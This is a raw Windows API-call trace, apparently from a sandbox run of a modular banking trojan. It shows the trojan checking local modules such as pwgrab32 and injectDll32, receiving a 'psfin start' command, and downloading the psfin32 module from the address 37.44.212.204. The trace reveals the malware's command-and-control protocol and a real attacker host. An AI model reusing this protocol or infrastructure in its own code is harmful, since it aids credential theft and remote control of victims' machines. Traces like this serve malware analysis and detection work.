	[0219.840] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad768) returned 1
	[0219.840] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0219.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad768
	[0219.840] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26ad768, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0219.840] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.841] GetFileTime (in: hFile=0x56c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.841] CloseHandle (hObject=0x56c) returned 1
	[0219.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad768) returned 1
	[0219.841] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0219.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26ad768
	[0219.841] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26ad768, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0219.841] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x56c
	[0219.841] GetFileTime (in: hFile=0x56c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0219.841] CloseHandle (hObject=0x56c) returned 1
	[0219.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x6b2cc160, dwHighDateTime=0x1d50a6a)) 
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad768) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad550) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad338) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ad120) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26acf08) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d0d0) returned 1
	[0219.841] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6e40) returned 1
	[0219.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6e40
	[0219.841] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0219.842] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0219.842] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0219.842] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0219.842] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0220.220] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0220.220] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0220.220] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x7f) returned 1
	[0220.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0220.220] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x225b00, dwNumberOfBytesToRead=0x7f, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x225b00*, lpdwNumberOfBytesRead=0x128bdc*=0x7f) returned 1
	[0220.220] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0220.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=127, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 127
	[0220.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311420
	[0220.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=127, lpWideCharStr=0x2311420, cchWideChar=127 | out: lpWideCharStr="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890") returned 127
	[0220.221] StrStrIW (lpFirst="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890"
	[0220.221] StrStrIW (lpFirst="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890"
	[0220.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0220.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x248940
	[0220.221] lstrcpynW (in: lpString1=0x248940, lpString2="62/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", iMaxLength=3 | out: lpString1="62") returned="62"
	[0220.221] StrStrIW (lpFirst="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890"
	[0220.221] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ad378, Size=0x10) returned 0x248910
	[0220.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad378
	[0220.221] lstrcpynW (in: lpString1=0x22ad378, lpString2="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", iMaxLength=7 | out: lpString1="tot478") returned="tot478"
	[0220.221] StrStrIW (lpFirst="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890"
	[0220.222] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248910, Size=0x10) returned 0x2488f8
	[0220.222] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c8638
	[0220.222] lstrcpynW (in: lpString1=0x22c8638, lpString2="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", iMaxLength=50 | out: lpString1="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611"
	[0220.222] StrStrIW (lpFirst="r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/68975886/\r\npsfin start\r\n1234567890"
	[0220.222] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2488f8, Size=0x10) returned 0x248910
	[0220.222] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7500
	[0220.222] lstrcpynW (in: lpString1=0x22c7500, lpString2="r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S/68975886/\r\npsfin start\r\n1234567890", iMaxLength=32 | out: lpString1="r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S") returned="r8Tm9VqDZwCTm4Rj3MjzFcsDVo8Tp9S"
	[0220.222] StrStrIW (lpFirst="68975886/\r\npsfin start\r\n1234567890", lpSrch="/") returned="/\r\npsfin start\r\n1234567890"
	[0220.223] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x248910, Size=0x20) returned 0x263a28
	[0220.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0220.223] lstrcpynW (in: lpString1=0x2777c18, lpString2="68975886/\r\npsfin start\r\n1234567890", iMaxLength=9 | out: lpString1="68975886") returned="68975886"
	[0220.223] StrStrIW (lpFirst="\r\npsfin start\r\n1234567890", lpSrch="/") returned 0x0
	[0220.223] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x263a28, Size=0x20) returned 0x2777e70
	[0220.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7548
	[0220.223] lstrcpynW (in: lpString1=0x22c7548, lpString2="\r\npsfin start\r\n1234567890", iMaxLength=26 | out: lpString1="\r\npsfin start\r\n1234567890") returned="\r\npsfin start\r\n1234567890"
	[0220.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263a28
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6228) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff900) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff858) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c82f0) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27330c0) returned 1
	[0220.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5f50) returned 1
	[0220.223] StrStrIW (lpFirst="\r\npsfin start\r\n1234567890", lpSrch="\r\n") returned="\r\npsfin start\r\n1234567890"
	[0220.223] StrStrIW (lpFirst="psfin start\r\n1234567890", lpSrch="\r\n") returned="\r\n1234567890"
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27330c0
	[0220.224] lstrcpynW (in: lpString1=0x27330c0, lpString2="psfin start\r\n1234567890", iMaxLength=12 | out: lpString1="psfin start") returned="psfin start"
	[0220.224] StrStrIW (lpFirst="1234567890", lpSrch="\r\n") returned 0x0
	[0220.224] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff858, Size=0x10) returned 0x22ff900
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777df8
	[0220.224] lstrcpynW (in: lpString1=0x2777df8, lpString2="1234567890", iMaxLength=11 | out: lpString1="1234567890") returned="1234567890"
	[0220.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311420) returned 1
	[0220.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e70) returned 1
	[0220.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff900) returned 1
	[0220.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0220.224] lstrcmpW (lpString1="68975886", lpString2="68975813") returned 1
	[0220.224] StrStrIW (lpFirst="psfin start", lpSrch=" ") returned=" start"
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff858
	[0220.224] lstrcpynW (in: lpString1=0x22ff858, lpString2="psfin start", iMaxLength=6 | out: lpString1="psfin") returned="psfin"
	[0220.224] StrStrIW (lpFirst="start", lpSrch=" ") returned 0x0
	[0220.224] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff900, Size=0x10) returned 0x22ffdf8
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff900
	[0220.224] lstrcpynW (in: lpString1=0x22ff900, lpString2="start", iMaxLength=6 | out: lpString1="start") returned="start"
	[0220.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
	[0220.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffa8
	[0220.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="start", cchWideChar=-1, lpMultiByteStr=0x22fffa8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="start", lpUsedDefaultChar=0x0) returned 6
	[0220.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0220.225] lstrcmpiW (lpString1="injectDll32", lpString2="psfin32") returned -1
	[0220.225] lstrcmpiW (lpString1="pwgrab32", lpString2="psfin32") returned 1
	[0220.225] lstrcmpiW (lpString1="networkDll32", lpString2="psfin32") returned -1
	[0220.225] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0220.225] lstrcmpiW (lpString1="start", lpString2="start") returned 0
	[0220.225] lstrcmpiW (lpString1="start", lpString2="release") returned 1
	[0220.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0220.225] lstrcmpiW (lpString1="injectDll32", lpString2="psfin32") returned -1
	[0220.225] lstrcmpiW (lpString1="pwgrab32", lpString2="psfin32") returned 1
	[0220.225] lstrcmpiW (lpString1="networkDll32", lpString2="psfin32") returned -1
	[0220.225] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0220.225] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0220.225] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5988
	[0220.227] WinHttpConnect (hSession=0x22c5988, pswzServerName="37.44.212.204", nServerPort=0x1bf, dwReserved=0x0) returned 0x22c5a70
	[0220.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d80
	[0220.227] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c75d8
	[0220.227] WinHttpSetTimeouts (hInternet=0x22c5988, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0220.227] WinHttpOpenRequest (hConnect=0x22c5a70, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/psfin32/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26ae6f0
	[0220.227] WinHttpSetOption (hInternet=0x26ae6f0, dwOption=0x1f, lpBuffer=0x128338, dwBufferLength=0x4) returned 1
	[0220.227] WinHttpSendRequest (hRequest=0x26ae6f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0224.983] WinHttpReceiveResponse (hRequest=0x26ae6f0, lpReserved=0x0) returned 1
	[0224.983] WinHttpQueryHeaders (in: hRequest=0x26ae6f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128328, lpdwBufferLength=0x128324, lpdwIndex=0x0 | out: lpBuffer=0x128328*, lpdwBufferLength=0x128324*=0x4, lpdwIndex=0x0) returned 1
	[0224.983] WinHttpQueryDataAvailable (in: hRequest=0x26ae6f0, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0xee5) returned 1
	[0224.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xef0) returned 0x22efc68
	[0224.984] WinHttpReadData (in: hRequest=0x26ae6f0, lpBuffer=0x22efc68, dwNumberOfBytesToRead=0xee5, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x22efc68*, lpdwNumberOfBytesRead=0x128324*=0xee5) returned 1
	[0224.984] WinHttpQueryDataAvailable (in: hRequest=0x26ae6f0, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x2000) returned 1
	[0224.984] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22efc68, Size=0x2ef0) returned 0x27bef60
	[0224.984] WinHttpReadData (in: hRequest=0x26ae6f0, lpBuffer=0x27bfe45, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x27bfe45*, lpdwNumberOfBytesRead=0x128324*=0x2000) returned 1
	[0224.984] WinHttpQueryDataAvailable (in: hRequest=0x26ae6f0, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x101c) returned 1
	[0224.984] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bef60, Size=0x3f10) returned 0x27bef60
	[0224.985] WinHttpReadData (in: hRequest=0x26ae6f0, lpBuffer=0x27c1e45, dwNumberOfBytesToRead=0x101c, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x27c1e45*, lpdwNumberOfBytesRead=0x128324*=0x101c) returned 1
	[0224.985] WinHttpQueryDataAvailable (in: hRequest=0x26ae6f0, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x9af) returned 1
	[0224.985] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bef60, Size=0x48b0) returned 0x27bef60
	[0224.985] WinHttpReadData (in: hRequest=0x26ae6f0, lpBuffer=0x27c2e61, dwNumberOfBytesToRead=0x9af, lpdwNumberOfBytesRead=0x128324 | out: lpBuffer=0x27c2e61*, lpdwNumberOfBytesRead=0x128324*=0x9af) returned 1
	[0224.985] WinHttpQueryDataAvailable (in: hRequest=0x26ae6f0, lpdwNumberOfBytesAvailable=0x12832c | out: lpdwNumberOfBytesAvailable=0x12832c*=0x0) returned 1
	[0224.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22abfc0
	[0224.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2764c60
	[0224.985] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.986] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.986] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0224.986] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778dc0
	[0224.987] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778dc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778dc0, pdwDataLen=0x128ba4) returned 1
	[0224.987] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.987] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.987] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.987] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.987] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0224.987] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778e10
	[0224.987] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778e10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778e10, pdwDataLen=0x128ba4) returned 1
	[0224.987] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.987] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.987] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.988] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.988] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0224.988] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778e38
	[0224.988] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778e38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778e38, pdwDataLen=0x128ba4) returned 1
	[0224.988] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.988] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.988] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.988] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.988] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0224.988] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778e60
	[0224.988] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778e60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778e60, pdwDataLen=0x128ba4) returned 1
	[0224.988] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.988] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.988] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.989] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.989] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0224.989] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778e88
	[0224.989] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778e88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778e88, pdwDataLen=0x128ba4) returned 1
	[0224.989] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.989] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.989] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.989] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.989] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0224.989] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778eb0
